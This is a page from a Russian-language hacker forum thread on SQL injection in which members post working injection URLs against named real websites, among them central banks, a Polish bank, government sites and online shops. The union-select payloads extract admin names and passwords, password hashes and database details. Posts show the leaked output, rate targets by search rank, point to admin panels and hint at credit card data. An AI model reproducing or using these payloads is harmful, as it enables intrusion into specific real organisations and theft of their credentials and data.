SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 641 of 798
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://marketnara.com/home/view_goods.html?pid=-18+union+select+1,group_concat(name,char(58),pass),3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+admin
     
    _________________________
    #12801 Konqi, 26 Aug 2010
    2 people like this.
  2. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    The Central Bank of Mauritius
    Oracle
    Code:
    http://bom.intnet.mu/?id=-40416+union+select+null+from+sys.dual--
    Eastern Caribbean Central Bank
    mssql
    Code:
    http://www.eccb-centralbank.org/About/vac_details.asp?vacID=63+or+1=(select top 1 table_name from information_schema.tables)--
    Version:
     
    #12802 Дирижабль, 26 Aug 2010
    2 people like this.
  3. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    PR - 5
    user: root@localhost
    version: 4.0.25
    database: eurovals_valstybe
    PR - 7
    version: 4.1.22
    user: root@localhost
    database: fpds2009z
    сайт некой федеральной службы вроде как :\
     
    #12803 *uNkN0Wn*, 27 Aug 2010
    Last edited: 27 Aug 2010
    1 person likes this.
  4. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    user() indiaeba_ebauser@localhost
    version() 5.0.91-community
    database() indiaeba_ebazar

    user() i31girl_public@localhost
    version() 5.0.91-community
    database() i31girl_shop
    Credit Cards ;)
     
    #12804 *uNkN0Wn*, 27 Aug 2010
    Last edited: 27 Aug 2010
    1 person likes this.
  5. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    user() [email protected]
    version() 5.0.85-enterprise
    database() ec2u
     
    #12805 *uNkN0Wn*, 27 Aug 2010
  6. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    ну что банковская тема еще жива? Кстати заметил что в зоне ру банковские сайты намного защищеннее чем их зарубежные аналоги, хотя и можно при большом желании найти багу

    Банк «Объединённый капитал»

    Code:
    http://www.okbank.ru/?p=-61+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
     
    #12806 Kusto, 28 Aug 2010
    2 people like this.
  7. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87

    PR 1


    PR 4


    PR 4


    ТИЦ 10 PR 6


    ТИЦ 10 PR 6


    ТИЦ 10 PR 5


    ТИЦ 220 PR 3


    PR 1


    PR 2


    PR 5
     
    #12807 -PRIVAT-, 28 Aug 2010
    1 person likes this.
  8. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.queento.ru/site.php?id=-57+union+select+1,concat_ws(0x3a,login,0x3a,pass_hash),3,4,5,6,7,8+from+accounts+limit+0,1--

    http://www.safarimaldives.com/live.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+

    http://www.pacificotowncenter.com/world.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,LOGIN,0x3a,PASSWORD),8,9,10+from+tbl_admin+--+
     
    #12808 tracy, 28 Aug 2010
    Last edited: 28 Aug 2010
    1 person likes this.
  9. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    PR - 6
     
    #12809 *uNkN0Wn*, 28 Aug 2010
    Last edited: 28 Aug 2010
    2 people like this.
  10. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Getin Holding S.A.
    до банка не добрался :(

    Code:
    http://www.getin.pl/en/index.php?&level=pnews&&id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21--
    Code:
    5.1.48-1-log:getin2:[email protected]
     
    #12810 f1ng3r, 28 Aug 2010
    4 people like this.
  11. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.arcdream.com/godlike/power.php?id=-1+union+select+1,group_concat(0x3a,version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

    Яндекс тИЦ 10
    Google PageRank 4
     
    #12811 tracy, 28 Aug 2010
  12. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    http://www.machineshopmarketing.com/news.php?id=-138+union+select+1,group_concat(user(),version()),3,4,5,6,7+--+

    вывод в тайтле

    Странная скуля. Кто выведет что, объясните в лс.
     
    #12812 *uNkN0Wn*, 28 Aug 2010
    Last edited: 29 Aug 2010
  13. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.smplus.ru/green.php?id_cat=3&id=-15+union+select+1,table_name,3,4,5,6+from+information_schema.tables+--+

    http://www.dms7.ru/index.php?name=portfolio&part=-4+union+select+group_concat(0x3a,version(),0x3a,user())+--+
     
    #12813 tracy, 28 Aug 2010
  14. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    5.0.45-log menaniitdb0001 [email protected]


    5.1.41-3UBUNTU12.6:C1_ALLMETAL:C1_ALLMETAL@LOCALHOST


    Database Version: 4.1.16-standard-log
    Database name: 030594med
    User name: [email protected]


    4.1.25-Debian_mt1:db33932_wanyone:[email protected]

    5.4.2-beta-log:ruspioner_new:ruspioner@localhost


    4.1.22-standard-log:356371_artlounge:[email protected]
     
    #12814 RedX, 29 Aug 2010
    Last edited: 29 Aug 2010
  15. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.fotosviat.bg/php/contest_month.php?id=-36+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))--

    http://www.bergerssports.com/events/events_month.php?id=2+group+by+7+--+


    http://www.gold-mile.ru/houses/index.php?type=specials&id=86+union+select+1,2+--+
    ТИЦ : 10 PR: 4

    http://www.lavina.ru/window.php?id=128+'+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10+--+
    ТИЦ : 50 PR: 3

    http://www.promoonly.com/search/printfriendly_month.php?id_fp=1&month=1&year=-2008
    ТИЦ : 10
     
    #12815 tracy, 29 Aug 2010
    Last edited by a moderator: 29 Aug 2010
    2 people like this.
  16. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://www.briarshallhotel.co.uk/window.php?id=-71+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--+[/COLOR]
    5.1.48-community-log:web86-briars:web86-briars@localhost
    PageRank 3

    Code:
    [COLOR=White]http://pushino-oka.ru/desk/ind.php?pn=6&id_categ=-42+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM%20INFORMATION_SCHEMA.TABLES--+[/COLOR]
    5.0.84-percona-highperf-b18-log:Markus7_desk:[email protected]
    тиц 20
     
    #12816 stepashka_, 29 Aug 2010
    Last edited: 29 Aug 2010
    5 people like this.
  17. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    ТИЦ : 10

     
    #12817 tracy, 29 Aug 2010
  18. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    похек GOV

    Code:
    [SIZE=3][COLOR=White]http://www.zzhk.[SIZE=4][COLOR=Red]gov[/COLOR][/SIZE].cn/zwgk/xxgk_show.php?id=13809+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--[/COLOR][/SIZE]
    PR: 4 Tcy: 0
    Database Version: 5.0.45-community-nt
    Database name: zzhk
    User name: zzhk@localhost
    OC type: Win32
    http://www.zzhk.gov.cn/phpmyadmin/ - 200 OK

    Code:
    [COLOR=White]http://www.crbio03.[COLOR=Red][SIZE=4]gov[/SIZE][/COLOR].br/sobre/index.php?id=1709+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--[/COLOR]

    PR: 5 Tcy: 0
    Database Version: 5.0.90-community
    Database name: crbio3_crbio3c
    User name: crbio3_crbio3@localhost
    OC type: pc-linux-gnu

    Code:
    [COLOR=White][SIZE=3]http://www.iz.sp.[COLOR=Red]gov[/COLOR].br/pesq_bia.php?id=17209+and+1=0+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16--[/SIZE][/COLOR]
    PR: 5 Tcy: 0
    Database Version: 5.0.77
    Database name: db_zootecnia
    User name: site@localhost
    OC type: portbld-freebsd6.2
    File_priv:Y
    http://www.iz.sp.gov.br/phpinfo.php - 200 OK
     
    #12818 daniel_1024, 29 Aug 2010
    6 people like this.
  19. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://ukrboard.info/ind.php?pn=1&id_typ=-49+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+[/COLOR]
    5.0.22:vetaxa_ukrboard:vetaxa_do8@localhost
    тиц 20
    PageRank 2
    Админка http://ukrboard.info/Admin/

    Code:
    [COLOR=White]http://www.cbo.kz/board/ind.php?pn=1&id_categ=-29+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,33--+[/COLOR]
    5.0.91-LOG:V-271_BOARD:[email protected]
    тиц 40
    PageRank 3

    Code:
    [COLOR=White]http://www.kay.by/rasprodaza/ind.php?pn=2&id_typ=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]
    4.1.22-standard:kayby_1:kayby_1@localhost
    тиц 30
    PageRan 5

    Code:
    [COLOR=White]http://www.mckn.ru/gocka/ind.php?pn=0&id_categ=-3+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a,version(),database(),user()))),7,8,9,10,11,12,13,14,15--+[/COLOR]
    4.1.11-Debian_4sarge5-log:z59769_mckn:[email protected]
    тиц 230
    PageRank 2
    Админка http://www.mckn.ru/admin/

    Code:
    [COLOR=White]http://www.autodvor.com/ind.php?pn=3&id_categ=-209+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]
    5.1.47-community-log:bestmobi_doska:bestmobi_admin@localhost
    тиц 10
    PageRank 2
    Админка http://www.autodvor.com/Admin/

    Code:
    [COLOR=White]http://www.master-class-realty.ru/doska/ind.php?pn=1&id_typ=-162+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13--+[/COLOR]
    5.0.45-LOG:MASTERDOSKI6:ROOT@LOCALHOST
    тиц 80
     
    #12819 stepashka_, 29 Aug 2010
    Last edited: 30 Aug 2010
    1 person likes this.
  20. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.eastpsych.com.au/pro.php?id=-77+UnIon+selECt+1,2,3,4,5,6,7,8+--+

    http://www.snowboardprofiles.com/pro.php?id=-3+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
    PR: 2
     
    #12820 tracy, 30 Aug 2010
(You must log in or sign up to post here.)
Page 641 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.